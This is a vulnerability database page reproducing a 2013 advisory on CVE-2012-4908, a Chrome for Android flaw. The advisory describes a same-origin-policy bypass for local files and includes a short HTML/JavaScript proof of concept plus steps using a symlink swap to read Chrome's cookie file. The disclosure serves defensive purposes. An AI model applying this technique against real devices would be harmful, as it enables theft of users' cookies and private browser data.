Vulners
Lucene search
Chrome For Android Bypassing SOP Flaw
🗓️ 08 Jan 2013 00:00:00Reported by Takeshi TeradaType 
packetstorm🔗 packetstormsecurity.com👁 45 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2012-4908 | 12 Sep 201200:00 | – | circl |
 | CVE-2012-4908 | 13 Sep 201220:00 | – | cve |
 | CVE-2012-4908 | 13 Sep 201220:00 | – | cvelist |
 | CVE-2012-4908 | 13 Sep 201220:00 | – | debiancve |
 | EUVD-2012-4833 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-4908 | 13 Sep 201220:55 | – | nvd |
 | Design/Logic Flaw | 13 Sep 201220:55 | – | prion |
 | CVE-2012-4908 | 22 May 202505:36 | – | redhatcve |
 | Chrome for Android - Bypassing SOP for Local Files By Symlinks | 10 Jan 201300:00 | – | securityvulns |
| Google Chrome for Android multiple security vulnerabilities | 10 Jan 201300:00 | – | securityvulns |
10
`CVE Number: CVE-2012-4908
Title: Chrome for Android - Bypassing SOP for Local Files By Symlinks
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability
Overview:
Chrome for Android's Same-Origin Policy for local files (file: URI) can be
bypassed by using symbolic links. It results in theft of Chrome's private
files by malicious Android apps.
Details:
Chrome for Android seems to forbid a local file to read another file,
except for the originating file itself.
http://code.google.com/p/chromium/issues/detail?id=37586
However, it is possible to circumvent the restriction by a trick using
symbolic link.
This issue enables malicious Android apps to steal Chrome's private
files such as Chrome's Cookie file, bookmark file, and so on.
As an example, steps to steal Chrome's Cookie file are described below:
1. An attacker's app creates a malicious HTML file, and makes Chrome load
its URL with file: URI. The malicious HTML contains JavaScript code
which, a few seconds later, tries to read the content of same URL with
the malicious HTML itself via XMLHttpRequest.
<body>
<u>Wait a few seconds.</u>
<script>
function doitjs() {
var xhr = new XMLHttpRequest;
xhr.onload = function() {
alert(xhr.responseText);
};
xhr.open('GET', document.URL);
xhr.send(null);
}
setTimeout(doitjs, 8000);
</script>
</body>
2. Before XHR fires, the attacker's app replaces the malicious
HTML file with a symlink pointing to Chrome's Cookie file.
3. When XHR fires, Chrome follows the symlink and provides the
content of the Chrome's Cookie file to the malicious HTML.
The attacker's app can also get the content of Chrome's other private
files in a similar manner.
Proof of Concept:
HTML/JavaScript is shown above. At present I do not have plans to disclose
PoC of malicious Android app.
Timeline:
2012/08/19 Reported to Google security team
2012/08/25 Re-reported to Chrome security team
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory
Recommendation:
Upgrade to the latest version.
Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144866
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jan 2013 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.03629